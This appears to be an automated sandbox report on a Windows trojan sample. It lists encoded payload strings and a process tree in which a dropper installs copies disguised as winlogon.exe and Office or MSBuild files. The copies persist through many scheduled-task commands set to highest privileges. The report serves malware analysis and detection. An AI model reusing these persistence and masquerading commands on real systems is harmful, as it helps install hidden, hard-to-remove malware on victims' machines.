tofECaKMic/6PCtDk0EnQlFziP6PoNO8b89heFnha/Etao0IegEDJYcFCxQxImfG2OgBwRouKgm8b2JwR9PcamcRdxO7KTmhK2ibwd72oBcqJbrnZiIS0fDY6AbLCl4pVRvAXZho1U
                                Source: 4.3.dwartg.exe.70006d6.1.raw.unpack, qJk.csBase64 encoded string: 'H4sIAAAAAAAEAMsoKSkottLXzyzIzEvL18vM188qzs8DACTOYY8WAAAA', 'H4sIAAAAAAAACssoKSkottLXTyzI1Mss0CtO0k9Pzc8sAABsWDNKFwAAAA=='
                                Source: 4.3.dwartg.exe.70006d6.1.raw.unpack, sz3.csBase64 encoded string: 'IRHKkK7+9S0IugXON3gvLsxJjZL9YaEKz/ItfY2KMibv3HGRDY4HX1+0x6vyRlP1N4gE0v20VeDKoKK009sEy3ouyqPq1nDV7UInHLKa0+i1EzCuhkbBF+hHquku7Lo/yvKfWKTtDSC0cid2m2aAXySLeN9z77QHOw6ohp+EDczjdlkMq8m7a2ClwiEast7dEwz6w4bD8wTSzoz4j5qzrO8RqjmHTyrApuBSl+1gu2s5LoFXoH5oPozdF2hTyr4UJafbA2pNEGdP/VLXgbIg4QM5bvggf+gkojeqw45IqHRg8ZcCDn/xnBJvzaQskNO/n2SyskcGTGC2IHglQTunUGHh4+wEaQYtR4uojeQt1AxtzrO/QY7Xs4yhQpA5ELH1fxkHlN9mBEm06zoECj/vz7jJG2mQlWiHY9U9LUYCXv/lx66c36E3vw4zQ5xVrzhaydHvLiCXt0pZUDFEWfZaVaZ5AKGW0zqkBSvHh4qMXIukrkK1kUF6G2eX26nBF9etwOUvoJ9uQsq2Dy+GQBdk03ZdTGhPoKKJfEvzulE4FSXAoUFrTLyla3gXMOhV434cPyDRSbyiZCGATsBDfEtT+1yp5qKdbJS1GVEo5JVGDZl853Kba/dh4CBx/W6Bj/DOJfimC7NBUJ/HnfsGb830T09NrdXxjZIarRpeDSqLXVWibkiIPnFO4OU2WXtEARxfTEp9gbRaEngqlbHte7O4oMf4xO52NXpTo1ex3oIjKRiCMDA77sbJvezZ+hixbnlgDJbVmAulozOcoeLeIT3ajMgqvfmAPVAXbuYvJdtKwevtf2DUl7lEqIkiitboMQ9wa/o5JrJJMwrsX1U4U56gMIX+zCYsR3sgBH+1dLI394nm8h9oLc/7DXLFKCEkJSnOT6P/PRLwNHmWcoHO0WJ5Y6IdGtC8rsInOmg1aD9JbLPqksSmWRX6XfZYmKthY9wC1SDjDFSXykgutRHU6ciKTBRxlvwAPW8V/yOJ1rOCNpk='
                                Source: 4.3.dwartg.exe.70006d6.1.raw.unpack, Class17.csBase64 encoded string: 'ICBfX18gICAgICAgICAgIF8gICAgICBfX18gICAgICAgICAgICAgXyAgICAgICAgXyAgIF9fXyAgICBfIF9fX19fIA0KIHwgICBcIF9fIF8gXyBffCB8X18gIC8gX198XyBfIF8gIF8gX198IHxfIF9fIF98IHwgfCBfIFwgIC9fXF8gICBffA0KIHwgfCkgLyBfYCB8ICdffCAvIC8gfCAoX198ICdffCB8fCAoXy08ICBfLyBfYCB8IHwgfCAgIC8gLyBfIFx8IHwgIA0KIHxfX18vXF9fLF98X3wgfF9cX1wgIFxfX198X3wgIFxfLCAvX18vXF9fXF9fLF98X3wgfF98X1wvXy8gXF9cX3wgIA0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHxfXy8gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIA=='
                                Source: 4.3.dwartg.exe.70006d6.1.raw.unpack, Class16.csBase64 encoded string: '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
                                Source: 4.3.dwartg.exe.66f46d6.0.raw.unpack, HBw.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                                Source: 4.3.dwartg.exe.66f46d6.0.raw.unpack, HBw.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                                Source: 4.3.dwartg.exe.70006d6.1.raw.unpack, HBw.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                                Source: 4.3.dwartg.exe.70006d6.1.raw.unpack, HBw.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                                Source: classification engineClassification label: mal100.spre.troj.expl.evad.winEXE@60/41@2/2
                                Source: C:\Users\user\Desktop\H9gMIu2HXi.exeCode function: 0_2_00A27727 GetLastError,FormatMessageW,0_2_00A27727
                                Source: C:\Users\user\Desktop\H9gMIu2HXi.exeCode function: 0_2_00A3B6D2 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,0_2_00A3B6D2
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeFile created: C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exeJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exeFile created: C:\Users\user\AppData\Roaming\msBrokerJump to behavior
                                Source: C:\Recovery\winlogon.exeMutant created: NULL
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7540:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7908:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5000:120:WilError_03
                                Source: C:\Recovery\winlogon.exeMutant created: \Sessions\1\BaseNamedObjects\Local\DCR_MUTEX-wSLzwx2vNs3ciNJLvHL2
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7748:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7612:120:WilError_03
                                Source: C:\Users\user\Desktop\H9gMIu2HXi.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0Jump to behavior
                                Source: C:\Users\user\Desktop\H9gMIu2HXi.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\RarSFX0\1.bat" "
                                Source: C:\Users\user\Desktop\H9gMIu2HXi.exeCommand line argument: sfxname0_2_00A3F05C
                                Source: C:\Users\user\Desktop\H9gMIu2HXi.exeCommand line argument: sfxstime0_2_00A3F05C
                                Source: C:\Users\user\Desktop\H9gMIu2HXi.exeCommand line argument: STARTDLG0_2_00A3F05C
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exeCommand line argument: sfxname3_2_0032F05C
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exeCommand line argument: sfxstime3_2_0032F05C
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exeCommand line argument: p053_2_0032F05C
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exeCommand line argument: STARTDLG3_2_0032F05C
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exeCommand line argument: sfxname4_2_0073DF1E
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exeCommand line argument: sfxstime4_2_0073DF1E
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exeCommand line argument: STARTDLG4_2_0073DF1E
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exeCommand line argument: xzw4_2_0073DF1E
                                Source: H9gMIu2HXi.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Source: C:\Users\user\Desktop\H9gMIu2HXi.exeFile read: C:\Windows\win.iniJump to behavior
                                Source: C:\Users\user\Desktop\H9gMIu2HXi.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                                Source: H9gMIu2HXi.exeVirustotal: Detection: 60%
                                Source: H9gMIu2HXi.exeReversingLabs: Detection: 42%
                                Source: C:\Users\user\Desktop\H9gMIu2HXi.exeFile read: C:\Users\user\Desktop\H9gMIu2HXi.exeJump to behavior
                                Source: unknownProcess created: C:\Users\user\Desktop\H9gMIu2HXi.exe "C:\Users\user\Desktop\H9gMIu2HXi.exe"
                                Source: C:\Users\user\Desktop\H9gMIu2HXi.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\RarSFX0\1.bat" "
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe work.exe -priverdD
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exeProcess created: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe "C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe"
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\msBroker\xIIr5uE.vbe"
                                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\msBroker\2lT5LH2HofMC1aCPgzVrsLj8Fs1JHh.bat" "
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe "C:\Users\user\AppData\Roaming\msBroker/SurrogatewebSession.exe"
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "vXKtedDiKZHKptbUFqIBdHmZv" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\msbuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe'" /f
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "vXKtedDiKZHKptbUFqIBdHmZ" /sc ONLOGON /tr "'C:\Program Files (x86)\msbuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe'" /rl HIGHEST /f
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "vXKtedDiKZHKptbUFqIBdHmZv" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\msbuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe'" /rl HIGHEST /f
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jz2mm1cv\jz2mm1cv.cmdline"
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: unknownProcess created: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe "C:\Program Files (x86)\msbuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe"
                                Source: unknownProcess created: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe "C:\Program Files (x86)\msbuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe"
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES41D7.tmp" "c:\Windows\System32\CSCD00016AF5F994D2B979CA07EFAA630F3.TMP"
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "vXKtedDiKZHKptbUFqIBdHmZv" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\java\jre-1.8\bin\client\vXKtedDiKZHKptbUFqIBdHmZ.exe'" /f
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "vXKtedDiKZHKptbUFqIBdHmZ" /sc ONLOGON /tr "'C:\Program Files (x86)\java\jre-1.8\bin\client\vXKtedDiKZHKptbUFqIBdHmZ.exe'" /rl HIGHEST /f
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "vXKtedDiKZHKptbUFqIBdHmZv" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\java\jre-1.8\bin\client\vXKtedDiKZHKptbUFqIBdHmZ.exe'" /rl HIGHEST /f
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 8 /tr "'C:\Recovery\winlogon.exe'" /f
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\Recovery\winlogon.exe'" /rl HIGHEST /f
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 5 /tr "'C:\Recovery\winlogon.exe'" /rl HIGHEST /f
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "vXKtedDiKZHKptbUFqIBdHmZv" /sc MINUTE /mo 8 /tr "'C:\Program Files\Microsoft Office 15\vXKtedDiKZHKptbUFqIBdHmZ.exe'" /f
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "vXKtedDiKZHKptbUFqIBdHmZ" /sc ONLOGON /tr "'C:\Program Files\Microsoft Office 15\vXKtedDiKZHKptbUFqIBdHmZ.exe'" /rl HIGHEST /f
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "vXKtedDiKZHKptbUFqIBdHmZv" /sc MINUTE /mo 5 /tr "'C:\Program Files\Microsoft Office 15\vXKtedDiKZHKptbUFqIBdHmZ.exe'" /rl HIGHEST /f
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "vXKtedDiKZHKptbUFqIBdHmZv" /sc MINUTE /mo 9 /tr "'C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exe'" /f
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "vXKtedDiKZHKptbUFqIBdHmZ" /sc ONLOGON /tr "'C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exe'" /rl HIGHEST /f
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "vXKtedDiKZHKptbUFqIBdHmZv" /sc MINUTE /mo 11 /tr "'C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exe'" /rl HIGHEST /f
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "SurrogatewebSessionS" /sc MINUTE /mo 12 /tr "'C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe'" /f
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "SurrogatewebSession" /sc ONLOGON /tr "'C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe'" /rl HIGHEST /f
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "SurrogatewebSessionS" /sc MINUTE /mo 8 /tr "'C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe'" /rl HIGHEST /f
                                Source: unknownProcess created: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe
                                Source: unknownProcess created: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe
                                Source: unknownProcess created: C:\Recovery\winlogon.exe C:\Recovery\winlogon.exe
                                Source: unknownProcess created: C:\Recovery\winlogon.exe C:\Recovery\winlogon.exe
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\NZDl7DWO67.bat"
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe "C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe"
                                Source: unknownProcess created: C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exe "C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exe"
                                Source: unknownProcess created: C:\Recovery\winlogon.exe "C:\Recovery\winlogon.exe"
                                Source: C:\Recovery\winlogon.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c "C:\Recovery\winlogon.exe"
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Users\user\Desktop\H9gMIu2HXi.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\RarSFX0\1.bat" "Jump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe work.exe -priverdDJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exeProcess created: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe "C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe" Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\msBroker\xIIr5uE.vbe" Jump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\msBroker\2lT5LH2HofMC1aCPgzVrsLj8Fs1JHh.bat" "Jump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe "C:\Users\user\AppData\Roaming\msBroker/SurrogatewebSession.exe"Jump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jz2mm1cv\jz2mm1cv.cmdline"Jump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\NZDl7DWO67.bat" Jump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES41D7.tmp" "c:\Windows\System32\CSCD00016AF5F994D2B979CA07EFAA630F3.TMP"
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
